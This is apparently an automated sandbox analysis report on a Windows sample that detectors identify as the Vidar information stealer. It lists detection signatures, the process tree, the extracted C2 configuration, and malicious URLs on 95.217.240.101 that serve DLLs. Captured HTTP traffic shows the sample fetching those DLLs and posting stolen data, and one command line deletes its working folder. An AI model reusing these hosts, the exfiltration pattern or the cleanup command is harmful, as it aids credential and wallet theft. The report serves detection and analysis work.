
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1443407
MD5: 75db6dfdebb9bf0d98acfc15f2219c62
SHA1: 5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
SHA256: a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 75DB6DFDEBB9BF0D98ACFC15F2219C62)
    • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 7044 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5392 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Malware configuration (Vidar): {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: file.exe PID: 6352 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x20df0:$s1: JohnDoe
  • 0x20de8:$s2: HAL9TH
0.2.file.exe.ab0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: file.exe | Avira: detected
Source: https://95.217.240.101/freebl3.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/nss3.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/sqlx.dll | Sophos S4: Label: malware repository uri
Source: https://95.217.240.101/softokn3.dlleS | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/softokn3.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/msvcp140.dllsS9 | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/freebl3.dllwT= | Avira URL Cloud: Label: malware
Source: https://95.217.240.101 | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/msvcp140.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/D | Avira URL Cloud: Label: malware
Source: https://t.me/k0mono | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322/inventory/ | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322/badges | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/O | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/sqlx.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/mozglue.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/sqlx.dllI | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322 | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/msvcp140.dllyS# | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/vcruntime140.dll | Avira URL Cloud: Label: malware
Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C7C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC5AC6 FindFirstFileExW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199686524322
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199686524322 HTTP/1.1
    Host: steamcommunity.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 95.217.240.101
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 278
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 5713
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /sqlx.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 829
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /freebl3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /mozglue.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /msvcp140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /nss3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /softokn3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /vcruntime140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 1145
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 453
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 98013
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
    Host: 95.217.240.101
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 95.217.240.101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
